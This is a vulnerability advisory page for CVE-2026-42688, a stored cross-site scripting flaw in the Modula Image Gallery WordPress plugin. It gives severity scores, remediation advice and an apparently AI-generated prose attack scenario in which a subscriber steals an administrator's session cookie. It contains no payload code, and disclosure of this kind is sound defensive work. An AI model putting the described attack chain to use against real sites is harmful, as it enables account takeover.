Skip to main content

Modula Image Gallery CVE-2026-42688

| EUVD-2026-36836 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-15 Patchstack GHSA-cq6v-9fx8-4hwq
XSS Modula Image Gallery
6.5
CVSS 3.1 · Vendor: Patchstack
Share

Severity by source

Vendor (Patchstack) PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
vuln.today AI
5.4 MEDIUM

Subscriber auth required (PR:L), admin must view content (UI:R), scope changes to victim browser (S:C); no direct availability impact from XSS.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Patchstack).

CVSS VectorVendor: Patchstack

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

1
Analysis Generated
Jun 15, 2026 - 22:58 vuln.today

DescriptionCVE.org

Subscriber Cross Site Scripting (XSS) in Modula Image Gallery <= 2.14.23 versions.

AnalysisAI

Subscriber-level stored Cross-Site Scripting in the Modula Image Gallery WordPress plugin (versions up to and including 2.14.23) allows authenticated users with subscriber privileges to inject persistent malicious JavaScript into gallery content. When a higher-privileged user such as an administrator views the affected gallery, the injected script executes in their browser context, enabling session hijacking, credential theft, or unauthorized administrative actions. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Register subscriber account on target WordPress site
Delivery
Inject XSS payload into Modula Image Gallery field
Exploit
Payload persists in WordPress database
Execution
Admin visits gallery-rendered page
Persist
Malicious script executes in admin browser
Impact
Exfiltrate admin session token to attacker server
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold at minimum a WordPress subscriber account on the target site - PR:L in the CVSS vector confirms this authenticated precondition. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 6.5 (Medium) is supported by the vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L, indicating a network-reachable, low-complexity attack requiring only subscriber authentication, but dependent on an admin victim viewing the injected content (UI:R). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers a free subscriber account on a WordPress site running Modula Image Gallery 2.14.23 or earlier, then injects a JavaScript payload (such as a cookie-stealing script) into a gallery field that accepts subscriber input. When a site administrator logs in and navigates to the gallery or plugin management area, the stored script executes silently in their browser, exfiltrating the admin session cookie to an attacker-controlled server and granting full administrative access. …
Remediation The primary fix is to update the Modula Image Gallery plugin to a version beyond 2.14.23, which should include the XSS sanitization fix. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-42688 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy